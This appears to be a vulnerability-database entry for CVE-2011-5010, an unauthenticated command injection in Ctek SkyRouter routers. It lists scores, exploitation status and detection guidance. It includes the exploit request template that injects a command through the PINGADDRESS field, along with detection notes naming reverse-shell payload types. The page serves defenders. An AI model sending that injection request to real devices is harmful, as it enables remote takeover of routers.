cbcvebase.
CVE-2011-5010
published 2011-12-25

CVE-2011-5010: apps/a3/cfg_ethping.cgi in the Ctek SkyRouter 4200 and 4300 allows remote attackers to execute arbitrary commands via shell metacharacters in the PINGADDRESS…

PriorityP179critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
66.38%
99.2th percentile
apps/a3/cfg_ethping.cgi in the Ctek SkyRouter 4200 and 4300 allows remote attackers to execute arbitrary commands via shell metacharacters in the PINGADDRESS parameter for a "u" action.

Affected

2 ranges
VendorProductVersion rangeFixed in
ctekproductsskyrouter
ctekproductsskyrouter

Detection & IOCsextracted from sources · hover to see the quote

path/apps/a3/cfg_ethping.cgi
url/apps/a3/cfg_ethping.cgi
commandPOST /apps/a3/cfg_ethping.cgi with data: MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;<payload>+%26
  • Detect POST requests to /apps/a3/cfg_ethping.cgi containing shell metacharacters (e.g., ';', '&') in the PINGADDRESS parameter, which indicates command injection exploitation.
  • Look for POST requests where the CMD parameter is set to 'u' and PINGADDRESS contains URL-encoded shell metacharacters such as %3B (';') or %26 ('&').
  • The exploit requires no authentication; flag any unauthenticated POST to cfg_ethping.cgi on CTEK SkyRouter devices as high-priority.
  • Payload delivery relies on cmd-type payloads including perl, telnet, netcat-e, or bash reverse shells; monitor for outbound connections spawned from the CGI process.
  • ·The vulnerable parameter is PINGADDRESS with CMD=u action; other CMD values may not trigger the injection path.
  • ·The Metasploit module disables NOPs and limits payload space to 1024 bytes; payloads must be of type 'cmd' (generic, perl, telnet, netcat-e, or bash).

CVSS provenance

nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.